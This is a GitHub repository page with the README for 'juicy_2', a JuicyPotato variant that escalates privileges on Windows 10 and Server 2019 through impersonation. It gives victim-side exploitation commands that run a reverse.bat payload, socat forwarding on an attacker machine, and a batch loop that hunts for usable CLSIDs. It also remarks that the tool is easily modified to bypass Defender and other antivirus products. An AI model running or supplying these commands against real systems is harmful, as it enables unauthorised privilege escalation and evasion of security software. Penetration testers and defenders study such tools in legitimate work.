https://github.com/decoder-it/juicy_2
juicypotato for win10 > 1803 & win server 2019
Last synced: 3 months ago
- Host: GitHub
- URL: https://github.com/decoder-it/juicy_2
- Owner: decoder-it
- Created: 2021-02-23T19:10:26.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-02-23T20:25:16.000Z (over 3 years ago)
- Last Synced: 2024-05-02T18:07:53.195Z (6 months ago)
- Language: C
- Size: 104 KB
- Stars: 97
- Watchers: 3
- Forks: 16
- Open Issues: 0
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - decoder-it/juicy_2 - juicypotato for win10 > 1803 & win server 2019 (C)
README
# juicy_2
JuicyPotato for Win10 > 1803 & Win Server 2019
Please read my blog post first: https://decoder.cloud/2020/05/30/the-impersonation-game/
Disclaimer:
This is just a quick & dirty modification of our JuicyPotato in order to test valid CLSIDs and to impersonate them (YOU NEED IMPERSONATION PRIVILEGES) on newer Windows 10 and Windows Server 2019 platforms.
(I know, this version is caught by Defender and other AVs, but with some modifications to the code it's easy to bypass.)
A mandatory prerequisite is the ability to redirect traffic for port 135 to a forwarder machine under your control.
Feel free to improve the code; I was too lazy for this kind of stuff.
For testing a CLSID:

```
juicy_2 -z -x [ip of socat listener] -l [fake oxid resolver port] -n [local RPC server port] -c [CLSID to test]
```

Example:

on victim:

```
juicy_2 -z -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}
```

on attacker (192.168.1.1):

```
socat -v TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995
```

For exploitation:

on victim:

```
juicy_2 -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} -t * -p c:\temp\reverse.bat
```

on attacker (192.168.1.1):

```
socat -v TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995
```
Hunting for juicy CLSIDs with a stupid batch:

```bat
@echo off
REM Read one CLSID per line from clsid.list and test each with the -z (test) mode
FOR /F %%i IN (clsid.list) DO (
    REM Append the result for this CLSID to out.txt
    .\juicy_2 -z -x 192.168.1.1 -n 9998 -l 9995 -c %%i >> .\out.txt
    REM Wait 2 seconds before trying the next CLSID
    timeout /t 2
)
```